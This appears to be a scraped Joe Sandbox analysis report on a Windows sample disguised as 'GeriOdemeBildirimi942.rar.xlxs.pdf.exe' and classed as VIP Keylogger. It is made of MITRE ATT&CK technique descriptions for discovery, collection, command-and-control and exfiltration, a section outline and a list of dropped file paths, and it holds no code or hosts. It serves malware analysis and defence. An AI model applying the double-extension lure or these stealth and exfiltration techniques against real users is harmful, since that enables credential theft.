Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report GeriOdemeBildirimi942.rar.xlxs.pdf.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: VIP Keylogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Persistence and Installation Behavior

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\GeriOdemeBildirimi942.rar.xlxs.pdf.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SOFcFE.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0kwp5mcr.1ew.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2udamgpn.4ht.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5cfeqqlb.miq.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5xrtsjvy.xpt.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_e2teh2jh.fsg.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ore2exho.n4u.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vo3sef0r.azf.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wpwtzsyd.zea.ps1

C:\Users\user\AppData\Local\Temp\tmp1AF7.tmp

Windows Analysis Report
GeriOdemeBildirimi942.rar.xlxs.pdf.exe

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may steal data by exfiltrating it over a different protocol than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.
Tactics:	Exfiltration
Data Sources:	Application Log: Application Log Content, Cloud Storage: Cloud Storage Access, Command: Command Execution, File: File Access, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre